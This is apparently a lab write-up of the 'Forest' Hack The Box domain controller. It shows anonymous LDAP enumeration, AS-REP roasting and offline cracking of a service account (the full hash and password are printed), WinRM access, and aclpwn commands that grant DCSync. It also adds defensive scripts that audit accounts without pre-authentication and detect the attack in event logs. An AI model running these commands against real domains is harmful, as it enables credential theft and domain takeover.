Forest 10.10.10.161
Defenders think in lists. Attackers think in graphs. As long as this is true, attackers win. <John Lambert>
Last updated
Forest is an "Easy" difficulty Windows machine. It is a Windows Domain Controller (DC) with an Exchange server installed; solving it requires DC enumeration techniques and Kerberos knowledge.
Anonymous LDAP can be used to access the DC and enumerate domain objects. A service account was found with Kerberos pre-authentication disabled; its AS-REP hash can be cracked offline to gain initial access. This service account was a member of the "Account Operators" group, which can be used to create a privileged Exchange account.
Finally, this privileged account was leveraged to gain DCSync privileges on the domain and dump the NTLM hashes.
Nmap
Kerberos
SMB: smbclient, smbmap, enum4linux
LDAP: ldapsearch
NTLM: impacket/GetNPUsers
Password cracking: John
SMB connection: impacket/smbexec
Evil-winrm.rb
Vulnerability check: sherlock.ps1
secretsdump
Target machine: 10.10.10.161
Attacking (Hacker) machine: 10.10.14.18
The target machine IP is 10.10.10.161. Get a basic understanding of the services available on the target machine using an nmap aggressive scan of all available ports.
0.1) Quick Pre-searching
nmap 10.10.10.161, a quick scan to get the list of open ports
0.2) Detailed Analysis
Enumeration strategies
LDAP - Port 389
SMB - Port 135
Kerberos - Port 88
enum4linux 10.10.10.161, get the basic information of the target machine
nmap -p 389 --script ldap-rootdse 10.10.10.161
ldapsearch -x -h 10.10.10.161 -b "DC=htb,DC=local"
Keep this information for later use
Domain: HTB with the following users
HTB\sebastien
HTB\lucinda
HTB\svc-alfresco
HTB\andy
HTB\mark
HTB\santi
Anonymous SMB login is not allowed; the SMB service is not available without user credentials
smbclient -I 10.10.10.161 -L andy
smbmap -R Replication -H 10.10.10.161
Using kerbrute to evaluate the user accounts found above
../../../tools/win/kerbrute/kerbrute.py -domain htb.local -users ./user.list -passwords /usr/share/wordlists/rockyou.txt -outputfile forest_passwords.txt
It finds that the svc-alfresco account is a "no preauth" account (Kerberos pre-authentication is disabled). Try to get the TGT using GetNPUsers.
Add 10.10.10.161 to the hosts file for htb.local and try again
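The property GetNPUsers keys on is the DONT_REQ_PREAUTH bit (0x400000) in each account's userAccountControl attribute, which is readable over the same anonymous LDAP bind used above. The following script is an added example, not part of the original writeup: it parses ldapsearch-style LDIF output and reports every account with that bit set, decoding the other flags so a defender can audit their own domain for the same weakness. The LDIF sample is constructed (the account names follow the writeup; the userAccountControl values are assumed for illustration).

```python
# Added example: audit LDIF output from ldapsearch for accounts whose
# Kerberos pre-authentication is disabled (DONT_REQ_PREAUTH in userAccountControl).
# The sample LDIF below is constructed; its userAccountControl values are assumed.
import base64

# Subset of userAccountControl bits, as documented by Microsoft.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
}
DONT_REQ_PREAUTH = 0x400000

# Constructed sample, shaped like `ldapsearch -x -h <dc> -b "DC=htb,DC=local"` output.
SAMPLE_LDIF = """\
# extended LDIF
dn: CN=sebastien,CN=Users,DC=htb,DC=local
sAMAccountName: sebastien
userAccountControl: 66048

dn: CN=svc-alfresco,CN=Users,DC=htb,DC=local
sAMAccountName: svc-alfresco
userAccountControl: 4260352

dn: CN=andy,CN=Users,DC=htb,DC=local
sAMAccountName: andy
userAccountControl: 512

search: 2
result: 0 Success
"""


def parse_ldif(text):
    """Split LDIF into one dict per entry; attribute names are lower-cased."""
    entries, current = [], {}
    for line in text.splitlines():
        if line.startswith("#"):
            continue
        if not line.strip():                 # blank line terminates an entry
            if current:
                entries.append(current)
                current = {}
            continue
        key, _, value = line.partition(":")
        if value.startswith(":"):            # "attr:: <base64>" form
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        current[key.strip().lower()] = value.strip()
    if current:
        entries.append(current)
    return entries


def decode_uac(value):
    """Return the names of the known flags set in a userAccountControl value."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def accounts_without_preauth(ldif_text):
    """Return (sAMAccountName, flag names) for every entry with DONT_REQ_PREAUTH set."""
    hits = []
    for entry in parse_ldif(ldif_text):
        uac = int(entry.get("useraccountcontrol", "0"))
        if uac & DONT_REQ_PREAUTH:
            name = entry.get("samaccountname", entry.get("dn", "?"))
            hits.append((name, decode_uac(uac)))
    return hits


if __name__ == "__main__":
    for name, flags in accounts_without_preauth(SAMPLE_LDIF):
        print(f"{name}: {' | '.join(flags)}")
```

Against the constructed sample only svc-alfresco is reported. In a real audit, feed the script the saved output of the ldapsearch command above; any account it lists should have pre-authentication re-enabled (or, where a legacy client truly needs it, a long random password and tight monitoring), because its AS-REP can be requested and cracked offline without any credentials.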
Cracking AS-REP Hashes with HashCat/John
$krb5asrep$23$svc-alfresco@HTB.LOCAL:3ce79e32b438b810950ea097f50ccedf$63b3f13f672cc9d483230b4c28ea26ff574bd9906b92cd5193d8496b2059ba20d009e50f7f3eed3d5440709e3b45b949ae456f27dd61b58c4e81a70e60c41adf75af3615acdd655455daa8023a9e931e91078e72db14241e8670375052ea5e13d817f328ffc19ca80873b736892fc1b65127d2f3f852eb11cb5749b46bad8fe49349352f9b5995f26f5cd24ea13d446710004a7cd86177206b638cff8f791a8df3a3c3a059c9087a99f18c9f5b21445a306d3695aed15377b3380b4c8b3e431bcf59afedabedf890d4457c38f193d750052f952e0ea746a16e6014615b4afe1fd4a4335fa14d
john --wordlist=/usr/share/wordlists/rockyou.txt alfresco.tgt
python ../../../tools/win/impacket-0.9.20/examples/getTGT.py htb.local/svc-alfresco:s3rvice
Get the password of svc-alfresco
The password of svc-alfresco is confirmed, but SMB cannot be accessed with it
../../../tools/win/impacket-0.9.20/examples/smbexec.py htb.local/svc-alfresco:s3rvice@10.10.10.161 net user
3.1) WinRM
Test the WinRM (Windows Remote Management) service using this account
evil-winrm.rb
Get low-privilege access and check the flag
Check that svc-alfresco is not in the local Administrators group
3.2) Enumeration
No vulnerability found
sherlock.ps1
Cannot get the NTLM hashes with this account using secretsdump
4.1) Sherlock to find vulnerabilities in the system
Objective: from svc-alfresco to HTB.local
aclpwn -f svc-alfresco -ft user -d htb.local -t htb.local -dry -s 10.10.10.161 -u svc-alfresco -p s3rvice
aclpwn -f svc-alfresco -ft user -d htb.local -t htb.local -s 10.10.10.161 -u svc-alfresco -p s3rvice
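Both stages of this box leave distinctive traces on the domain controller: the AS-REP roast above is visible as a TGT request (Event ID 4768) with pre-authentication type 0, and the DCSync that aclpwn enables shows up as Event ID 4662 with the directory replication control-access rights exercised by an account that is not a domain controller. The script below is an added example, not part of the original writeup or of aclpwn: it runs that detection logic over constructed sample events shaped like the Windows Security log. The set of legitimate DC computer accounts (DC_ACCOUNTS) is an assumption you would fill from your own environment.

```python
# Added example: detect AS-REP roasting (4768, PreAuthType 0) and DCSync
# (4662 with replication rights from a non-DC account) over constructed events.
# Field names follow the Windows Security log; the events themselves are constructed.

# Control-access-right GUIDs for directory replication (documented by Microsoft).
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Computer accounts of legitimate domain controllers (assumed for this example).
DC_ACCOUNTS = {"FOREST$"}
RC4_HMAC = "0x17"   # TicketEncryptionType for RC4, the etype the $krb5asrep$23$ hash uses

# Constructed sample events (hosts follow the writeup; everything else is made up).
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "sebastien", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.161"},
    {"EventID": 4768, "TargetUserName": "svc-alfresco", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.18"},
    {"EventID": 4662, "SubjectUserName": "FOREST$", "ObjectType": "domainDNS",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "svc-alfresco", "ObjectType": "domainDNS",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]


def is_asrep_roastable_request(event):
    """4768 with PreAuthType 0: the KDC issued a TGT without pre-authentication."""
    return event.get("EventID") == 4768 and event.get("PreAuthType") == "0"


def replication_rights_used(event):
    """Names of replication rights present in a 4662 event's Properties, or []."""
    if event.get("EventID") != 4662:
        return []
    props = event.get("Properties", "").lower()
    return [name for guid, name in REPLICATION_GUIDS.items() if guid in props]


def detect(events):
    """Return (rule, account, detail) tuples for every suspicious event."""
    alerts = []
    for event in events:
        if is_asrep_roastable_request(event):
            detail = "TGT issued without pre-authentication"
            if event.get("TicketEncryptionType", "").lower() == RC4_HMAC:
                detail += "; RC4 encryption, AS-REP crackable offline"
            alerts.append(("asrep_roast", event["TargetUserName"], detail))
        rights = replication_rights_used(event)
        if rights and event.get("SubjectUserName", "").upper() not in DC_ACCOUNTS:
            alerts.append(("dcsync", event["SubjectUserName"], ", ".join(rights)))
    return alerts


if __name__ == "__main__":
    for rule, account, detail in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {account}: {detail}")
```

The first 4768 (sebastien, PreAuthType 2, AES) and the first 4662 (the DC's own machine account) are ignored; the svc-alfresco TGT request and the svc-alfresco replication call are flagged. Because every DC logs 4768 for its own AS exchanges, a PreAuthType of 0 is a reliable low-volume signal; for 4662 you must enable "Audit Directory Service Access" and expect to tune DC_ACCOUNTS and any backup or Azure AD Connect accounts that legitimately replicate.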
What is Kerberos and how to attack it.
https://www.tarlogic.com/en/blog/how-to-attack-kerberos/
https://stealingthe.network/quick-guide-to-installing-bloodhound-in-kali-rolling/
nmap -p 22,80,443 -A -oN nmap-forest.txt 10.10.10.161